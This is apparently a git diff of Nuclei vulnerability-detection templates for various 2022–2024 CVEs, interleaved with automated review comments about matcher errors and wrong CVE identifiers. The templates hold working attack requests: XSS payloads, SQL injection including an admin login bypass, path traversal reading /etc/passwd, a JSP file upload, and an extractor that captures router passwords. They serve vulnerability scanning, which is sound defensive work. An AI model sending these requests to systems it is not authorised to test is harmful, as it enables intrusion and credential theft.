metadata: + google-query: inurl:"carbon/admin/login" + verified: "true" + tags: cve,cve2022,wso2,xss,packetstorm + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-30776.yaml b/nuclei-templates/CVE-2022/cve-2022-30776.yaml deleted file mode 100644 index ee863c1351..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30776.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2022-30776 - -info: - name: Atmail 6.5.0 - Cross-Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - - https://www.atmail.com/ - - https://help.atmail.com/hc/en-us/sections/115003283988 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30776 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"atmail" - verified: "true" - tags: cve,cve2022,atmail,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Error: 1" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-31268.yaml b/nuclei-templates/CVE-2022/cve-2022-31268.yaml new file mode 100644 index 0000000000..b8148bb605 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31268.yaml 
@@ -0,0 +1,48 @@ +id: CVE-2022-31268 + +info: + name: Gitblit 1.9.3 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + reference: + - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md + - https://vuldb.com/?id.200500 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31268 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"Gitblit" + verified: "true" + tags: cve,cve2022,lfi,gitblit + +requests: + - method: GET + path: + - "{{BaseURL}}/resources//../WEB-INF/web.xml" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "" + - "java.sun.com" + - "gitblit.properties" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-31373.yaml b/nuclei-templates/CVE-2022/cve-2022-31373.yaml new file mode 100644 index 0000000000..8c1c21231b --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31373.yaml 
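Review bot: As shown in this hunk, the first entry of the body `words` list is the empty string `""`, which every response contains, so it adds nothing to the `condition: and` group. It may be a markup tag that was lost when the page was rendered; if the file really holds `""`, replace it with the intended marker or drop the entry. The same pattern is more serious in cve-2022-35416.yaml, where `""` is the only body word and the `Cookie: svpnlang=` value is empty. There the match rests on `text/html` and status 200 alone, which would flag unaffected hosts.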
@@ -0,0 +1,45 @@ +id: CVE-2022-31373 + +info: + name: SolarView Compact 6.00 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://github.com/badboycxcc/SolarView_Compact_6.0_xss + - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-31373 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,xss,solarview + +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/Solar_AiConf.php/">' + - 'HREF="Solar_Service.php"' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32015.yaml b/nuclei-templates/CVE-2022/cve-2022-32015.yaml new file mode 100644 index 0000000000..cb1ba49550 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32015.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2022-32015 + +info: + name: Complete Online Job Search System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32015 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,jobsearch + +variables: + num: "999999999" + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + +# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32022.yaml b/nuclei-templates/CVE-2022/cve-2022-32022.yaml deleted file mode 100644 index bbcd2e0040..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32022.yaml +++ /dev/null 
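Review bot: The request path `{{BaseURL}}/index.php?q=category&search=...` does not match the endpoint named in the description, `/eris/index.php?q=category&search=`. If the application is normally deployed under `/eris/` (the page does not say), a scan against the site root misses it and returns a false negative. Either add the `/eris/` variant as a second entry in the `path:` list or correct the description so the two agree. The classification also uses `PR:H` while the template has no login step, so a comment on whether authentication is actually required would help whoever triages a hit.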
@@ -1,51 +0,0 @@ -id: CVE-2022-32022 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32022 - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32022 - cwe-id: CWE-89 - metadata: - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,login-bypass - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin'+or+'1'%3D'1'%23&password=admin - - - | - GET /admin/index.php?page=home HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Welcome back Administrator!' - - 'action=logout' - - 'Manage Account' - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml deleted file mode 100644 index aaeeb7a420..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32025.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2022-32025 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32025 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}%23&password={{password}} - - - | - GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32026.yaml b/nuclei-templates/CVE-2022/cve-2022-32026.yaml new file mode 100644 index 0000000000..39e05a5192 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32026.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-32026 + +info: + name: Car Rental Management System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1 + Host: {{Hostname}} + + skip-variables-check: true + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32159.yaml b/nuclei-templates/CVE-2022/cve-2022-32159.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32159.yaml rename to nuclei-templates/CVE-2022/cve-2022-32159.yaml 
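Review bot: The `classification` block and the NVD reference name a different CVE than the template itself: `id: CVE-2022-32026` and the file name say 32026, but the hunk has `cve-id: CVE-2022-32028` and `https://nvd.nist.gov/vuln/detail/CVE-2022-32028`. Findings would then be reported or deduplicated under the wrong identifier. Assuming the id and file name are the intended ones, change these to `cve-id: CVE-2022-32026` and `- https://nvd.nist.gov/vuln/detail/CVE-2022-32026`. It is also worth checking which of the two references, `SQLi-8.md` or `SQLi-5.md`, belongs to the `manage_booking.php` issue described here.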
diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml new file mode 100644 index 0000000000..45a9d0ff2e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32409.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-32409 + +info: + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion + author: pikpikcu + severity: critical + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-94 + metadata: + shodan-query: http.html:"i3geo" + verified: "true" + tags: cve,cve2022,i3geo,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2022/cve-2022-33119.yaml b/nuclei-templates/CVE-2022/cve-2022-33119.yaml deleted file mode 100644 index c3e01af826..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-33119.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2022-33119 - -info: - name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. - reference: - - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-33119 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"NVRsolo" - verified: "true" - tags: cve,cve2022,nvrsolo,xss - -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: "><" - - language=en&user=user&pass=pass&submit=Login - - matchers: - - type: dsl - dsl: - - 'contains(all_headers, "text/html")' - - 'status_code == 200' - - contains(body,'<\"?cmd=') - condition: and - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-34047.yaml b/nuclei-templates/CVE-2022/cve-2022-34047.yaml new file mode 100644 index 0000000000..50283475b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-34047.yaml 
@@ -0,0 +1,45 @@ +id: CVE-2022-34047 + +info: + name: Wavlink Set_safety.shtml - Password Exposure + author: For3stCo1d + severity: high + description: | + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. + reference: + - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 + - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34047 + cwe-id: CWE-668 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve2022,wavlink,router,exposure,packetstorm,cve + +requests: + - raw: + - | + GET /set_safety.shtml?r=52300 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var syspasswd="' + - 'APP' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - 'syspasswd="(.+?)"' diff --git a/nuclei-templates/CVE-2022/cve-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml new file mode 100644 index 0000000000..90b8578414 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-35416.yaml 
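Review bot: The `extractors` block at the end of the template writes the value captured by `syspasswd="(.+?)"` into the scan output, so every positive result stores a device password in cleartext in logs, reports and whatever consumes them downstream. The two matchers already establish the finding without it. I would drop the extractor, or keep it only with a comment that makes the handling requirement explicit: `# output contains the device password; treat scan results as secret`.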
@@ -0,0 +1,46 @@ +id: CVE-2022-35416 + +info: + name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting + author: 0x240x23elu + severity: medium + description: | + H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. + reference: + - https://github.com/advisories/GHSA-9x76-78gc-r3m9 + - https://github.com/Docker-droid/H3C_SSL_VPN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-35416 + cwe-id: CWE-79 + metadata: + shodan-query: http.html_hash:510586239 + verified: "true" + tags: cve,cve2022,xss,vpn,h3c + +requests: + - raw: + - | + GET /wnm/login/login.json HTTP/1.1 + Host: {{Hostname}} + Cookie: svpnlang= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-36883.yaml b/nuclei-templates/CVE-2022/cve-2022-36883.yaml new file mode 100644 index 0000000000..56ea8fccfa --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-36883.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2022-36883 + +info: + name: Git Plugin up to 4.11.3 on Jenkins Build Authorization + author: c-sh0 + severity: high + description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. + reference: + - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36883 + cwe-id: CWE-862 + metadata: + shodan-query: X-Jenkins + verified: "true" + tags: cve,cve2022,jenkins,plugin,git + +requests: + - method: GET + path: + - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "repository:" + - "SCM API plugin" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2023/CVE-2023-23752.yaml b/nuclei-templates/CVE-2023/CVE-2023-23752.yaml deleted file mode 100644 index 7d7b738f04..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-23752.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2023-23752 - -info: - name: Joomla Webservice Endpoint access control - author: thecyberneh - description: An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. - severity: high - tags: cves - -requests: - - method: GET - path: - - "{{BaseURL}}/api/index.php/v1/config/application?public=true" - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "password" - - - type: word - part: body - words: - - "application" - - - type: word - part: body - words: - - "attributes" - - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2023/CVE-2023-35047.yaml b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml new file mode 100644 index 0000000000..a8e1f1a930 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35047 + +info: + name: "All Bootstrap Blocks <= 1.3.6 - Cross-Site Request Forgery to Plugin Settings Reset" + author: topscoder + severity: medium + description: "The All Bootstrap Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.6. This is due to missing nonce validation on the reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7a15ab-4f13-4eb1-aeb5-143230308871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2023-35047 + metadata: + fofa-query: "wp-content/plugins/all-bootstrap-blocks/" + google-query: inurl:"/wp-content/plugins/all-bootstrap-blocks/" + shodan-query: 'vuln:CVE-2023-35047' + tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-bootstrap-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-bootstrap-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') 
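Review bot: The only evidence behind a match is the `Stable tag` line of `readme.txt` compared with `compare_versions(version, '<= 1.3.6')`; the missing nonce check on `reset()` is never observed. That makes a hit an inventory signal rather than a confirmed finding. A readme that is blocked, removed or carries a non-numeric stable tag gives no match on an affected site, and a site whose readme is stale still matches. The template should say so, for example with a comment above `http:` reading `# version check only (readme.txt Stable tag); confirm the installed plugin version before triage`. The same applies to CVE-2024-38693.yaml, CVE-2024-39641.yaml, CVE-2024-39642.yaml and CVE-2024-39643.yaml in this commit.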
diff --git a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml deleted file mode 100644 index 0e3e21c1d4..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml +++ /dev/null 
@@ -1,68 +0,0 @@ -id: CVE-2023-3836 - -info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical - description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. - reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.02584 - epss-percentile: 0.89161 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" - -http: - - raw: - - | - POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Host: {{Hostname}} - - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary - - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - - extractors: - - type: regex - name: shell_filename - 
internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 490a00463044022019ed3a01869b520c888624caac663690abb0239bbe29ce2bd37bf0c9da3ceed102203bb8f2aef38ca4aa0349fe47f7a0e72a004678a13fb247d0ebd2abfbea426827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/Cve-2023-23752.yaml b/nuclei-templates/CVE-2023/Cve-2023-23752.yaml new file mode 100644 index 0000000000..5cdbcf0506 --- /dev/null +++ b/nuclei-templates/CVE-2023/Cve-2023-23752.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2023-23752 + +info: + name: Joomla! Webservice - Password Disclosure + author: badboycxcc,Sascha Brendel + severity: medium + description: | + An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + remediation: Upgrade to Joomla! version 4.2.8 or later. + reference: + - https://unsafe.sh/go-149780.html + - https://twitter.com/gov_hack/status/1626471960141238272/photo/1 + - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-23552 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 + epss-score: 0.70036 + epss-percentile: 0.97685 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: joomla + product: joomla\! + shodan-query: html:"Joomla! - Open Source Content Management" + tags: cve,cve2023,joomla + +http: + - method: GET + path: + - '{{BaseURL}}/api/index.php/v1/config/application?public=true' + - '{{BaseURL}}/api/v1/config/application?public=true' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"links":' + - '"attributes":' + condition: and + + - type: word + part: header + words: + - 'application/json' + - 'application/vnd.api+json' + condition: or + + - type: status + status: + - 200 +# digest: 4a0a00473045022100c1c30199254120237edebfcf5a43ddebc667fd98b7ae59cf38479d77d0b3783e022033b70e3a0709b48722717747cd4dd57191b549d785b53dcb67fb00fefb6183e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/gradio-CVE-2024-1561.yaml b/nuclei-templates/CVE-2024/CVE-2024-1561.yaml similarity index 100% rename from nuclei-templates/Other/gradio-CVE-2024-1561.yaml rename to nuclei-templates/CVE-2024/CVE-2024-1561.yaml 
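Review bot: The last `reference` entry points at `https://nvd.nist.gov/vuln/detail/CVE-2023-23552`, which is not the CVE in `id` and `cve-id` (CVE-2023-23752); it should read `- https://nvd.nist.gov/vuln/detail/CVE-2023-23752`. The template is named "Password Disclosure", yet the body matcher accepts any response containing `"links":` and `"attributes":`. A hit therefore shows that the endpoint answers without authentication, not that a secret was returned, and a comment stating that would help triage. The file name `Cve-2023-23752.yaml` also introduces a third casing next to the `CVE-` and `cve-` names used elsewhere in this commit.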
diff --git a/nuclei-templates/CVE-2024/cve-2024-23897.yaml b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml similarity index 100% rename from nuclei-templates/CVE-2024/cve-2024-23897.yaml rename to nuclei-templates/CVE-2024/CVE-2024-23897.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-38693.yaml b/nuclei-templates/CVE-2024/CVE-2024-38693.yaml new file mode 100644 index 0000000000..ecd61ec3cc --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-38693.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-38693 + +info: + name: > + WP User Frontend <= 4.0.7 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The WP User Frontend plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in versions up to, and including, 4.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2fdd6eb-c848-446c-abad-7d2ea93f5512?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-38693 + metadata: + fofa-query: "wp-content/plugins/wp-user-frontend/" + google-query: inurl:"/wp-content/plugins/wp-user-frontend/" + shodan-query: 'vuln:CVE-2024-38693' + tags: cve,wordpress,wp-plugin,wp-user-frontend,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-frontend/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + 